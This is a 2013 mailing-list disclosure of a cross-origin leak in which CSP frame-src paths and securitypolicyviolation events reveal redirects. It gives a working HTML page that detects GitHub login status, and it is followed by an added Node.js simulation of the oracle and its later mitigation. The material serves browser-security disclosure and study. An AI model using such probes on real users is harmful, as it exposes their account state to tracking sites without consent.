Cross-origin leakage with securitypolicyviolation events and paths in source expressions.

It appears that securitypolicyviolation events and paths in source
expressions are unintentionally useful for determining whether or not
redirects occur. For example, I can determine pretty trivially whether or
not a user is logged into GitHub with the following page in Chrome Canary
(with "Experimental WebKit Features" enabled):

  <!DOCTYPE html>
  <html>
  <head>
    <!-- Allow framing of this one path only; a frame that ends up anywhere
         else (e.g. redirected to a login page) violates the policy. -->
    <meta http-equiv="Content-Security-Policy" content="frame-src https://github.com/notifications">
  </head>
  <body>
    <script>
      // Fires if the frame's navigation ends outside the allowed path.
      document.addEventListener('securitypolicyviolation', function (e) {
        console.log(e);
      });
      var frame = document.createElement('iframe');
      document.body.appendChild(frame);
      frame.src = 'https://github.com/notifications';
    </script>
  </body>
  </html>

I don't see a trivial mitigation; if we have paths, then detecting
violations with some granularity is possible already via the POSTed report.
The violation event simply makes reacting to such detection easier. :/

--
Mike West <mkwst@google.com>, Developer Advocate
Google Germany GmbH, Dienerstrasse 12, 80331 München, Germany
Google+: https://mkw.st/+, Twitter: @mikewest, Cell: +49 162 10 255 91

Received on Sunday, 5 May 2013 07:19:06 UTC
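The oracle described in the message above, as an added example that is not part of Mike West's post: a Node.js model of a browser evaluating a path-bearing frame-src source expression at each hop of a redirect chain, first with the 2013 behaviour the message relies on (the final URL is checked against the path) and then with the "ignore the path component once a redirect has been followed" rule that CSP Level 2 later adopted. The github.com URLs and the response table are assumptions constructed for the example (a logged-out request to /notifications is assumed to redirect to /login); nothing here touches the network, and `matchesSourceExpression`, `simulateFrameLoad`, `probe` and `oracleLeaks` are names chosen for this model, not browser APIs.

```javascript
// Added example, not part of the original message: a model of the
// securitypolicyviolation redirect oracle. No network traffic; the
// "server" below is a constructed table of responses (an assumption
// about how github.com answered a framed /notifications request in 2013).
const CONSTRUCTED_SERVER = {
  loggedIn: {
    'https://github.com/notifications': { status: 200 },
  },
  loggedOut: {
    'https://github.com/notifications': {
      status: 302,
      location: 'https://github.com/login?return_to=%2Fnotifications',
    },
    'https://github.com/login?return_to=%2Fnotifications': { status: 200 },
  },
};

// Does `url` match one CSP source expression? Scheme and host (with port)
// must agree. A path ending in '/' is a prefix match, any other path is an
// exact match, and an expression without a path matches every path. With
// ignorePath=true the path component is skipped entirely, which is the rule
// CSP Level 2 applies to URLs reached through a redirect.
function matchesSourceExpression(expr, url, { ignorePath = false } = {}) {
  const e = new URL(expr);
  const u = new URL(url);
  if (e.protocol !== u.protocol || e.host !== u.host) return false;
  if (ignorePath || e.pathname === '/') return true;
  if (e.pathname.endsWith('/')) return u.pathname.startsWith(e.pathname);
  return u.pathname === e.pathname;
}

// Simulate loading an <iframe> under a frame-src allowlist, re-checking the
// policy at every hop of the redirect chain. Returns whether a
// securitypolicyviolation event would fire and which URL was blocked.
function simulateFrameLoad(frameSrc, startUrl, server,
                           { ignorePathAfterRedirect = false } = {}) {
  let url = startUrl;
  let redirected = false;
  for (let hop = 0; hop < 20; hop++) {
    const allowed = frameSrc.some((expr) =>
      matchesSourceExpression(expr, url,
        { ignorePath: ignorePathAfterRedirect && redirected }));
    if (!allowed) return { violation: true, blockedURI: url, finalUrl: null };

    const resp = server[url];
    if (!resp) throw new Error(`no constructed response for ${url}`);
    if (resp.status >= 300 && resp.status < 400) {
      url = resp.location;
      redirected = true;
      continue;
    }
    return { violation: false, blockedURI: null, finalUrl: url };
  }
  throw new Error('redirect loop in constructed server table');
}

// The attacker page from the message, reduced to one question:
// did a violation event fire for the probe frame?
const ATTACKER_POLICY = ['https://github.com/notifications'];
const PROBE_URL = 'https://github.com/notifications';

function probe(server, opts) {
  return simulateFrameLoad(ATTACKER_POLICY, PROBE_URL, server, opts).violation;
}

// True when the violation event differs between the two states, i.e. when
// the attacker page can read the victim's login status from it.
function oracleLeaks(opts) {
  return probe(CONSTRUCTED_SERVER.loggedIn, opts) !==
         probe(CONSTRUCTED_SERVER.loggedOut, opts);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('path checked after redirect (2013 behaviour): leaks =',
              oracleLeaks({ ignorePathAfterRedirect: false }));
  console.log('path ignored after redirect (CSP Level 2):    leaks =',
              oracleLeaks({ ignorePathAfterRedirect: true }));
}
```

The model only answers the Boolean the attacker cares about. Real browsers differ in what the event and the POSTed report carry (CSP Level 2 reduces `blocked-uri` to an origin after a cross-origin redirect, for instance), but the leak is in whether the event fires at all, and dropping the path check after a redirect is what makes the logged-in and logged-out runs indistinguishable.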